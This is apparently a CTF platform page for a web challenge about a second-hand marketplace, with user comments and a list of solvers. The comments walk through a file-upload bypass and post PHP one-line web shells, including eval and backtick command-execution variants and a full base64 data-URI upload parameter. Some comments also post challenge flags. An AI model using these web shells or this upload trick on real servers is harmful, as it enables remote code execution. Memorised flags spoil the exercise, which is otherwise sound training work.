xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2172
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
Zhumeng 18天前

注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php

回复 0

zhuohao 2月前

蚁剑一直返回数据为空 一直连不上

回复 0
hackhui 26天前

一句话木马传参加''

回复 0

LLTVLL 3月前

一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题

回复 0

BlueL1ght 9月前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 10月前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 1

vchopin 1年前

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上

回复 0

XRain 1年前

实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。

回复 0

不会编程的崽 1年前

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。

回复 0

三碗不过杠 1年前

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base

回复 1

冯飞99 1年前

这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}

回复 1

WriteUp

image
nic016

5 金币

评分(8)

解题动态

她说我们只是朋友 攻破了该题 9小时前
xstzdbcc 攻破了该题 1天前
19581700609 攻破了该题 3天前
guoadmin 攻破了该题 3天前
unilot 攻破了该题 4天前
17280870197 攻破了该题 5天前
ifnoif 攻破了该题 5天前
montarius 攻破了该题 5天前
17881152308 攻破了该题 7天前
陈尘 攻破了该题 7天前
kale 攻破了该题 8天前
szmlzw120 攻破了该题 10天前
nagatoyuki 攻破了该题 10天前
eggFr1edR1ce 攻破了该题 14天前
distiny 攻破了该题 14天前
2323277194 攻破了该题 15天前
bugku111rao 攻破了该题 15天前
miren2394 攻破了该题 16天前
希卡利 攻破了该题 17天前
cy1393842050 攻破了该题 18天前
问题反馈